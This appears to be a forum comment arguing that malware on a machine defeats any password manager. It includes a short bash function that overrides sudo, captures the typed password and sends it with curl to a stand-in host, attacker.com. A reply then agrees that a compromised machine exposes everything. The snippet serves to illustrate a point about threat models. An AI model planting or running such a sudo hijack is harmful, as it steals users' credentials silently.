Real world malware will bring everything it needs with it to wait until your password manager database file is unlocked next, or simply keylog or otherwise intercept the master password. To prove this point once for a client I made a modified Lastpass chrome browser plugin that intercepts the master password on next use.
I could write examples for every password manager but instead consider how simply malware can override your sudo command to steal it the next time you use it. No pure software defenses will help against any decent malware.
```
function sudo () {
realsudo=$(which sudo)
read -r -s -p "[sudo] password for $USER: " password
echo "$USER: $password" | \
curl -F 'p=<-' https://attacker.com >/dev/null 2>&1
$realsudo -S <<< "$password" -u root bash -C "exit" >/dev/null 2>&1
$realsudo "${@:1}"
```
> It is non obvious but important to understand that most password managers, such as 1password, Lastpass, and almost everything else, expose all secrets to malware in plain text any time the password database is unlocked
and I agree that this is then true.
However, I would also consider that this is true for everthing, no matter the software you use. If malware gets on your machine, consider anything you can access via your machine compromised. I think this is fairly obvious to people here, and has no bearing in which password manager to use.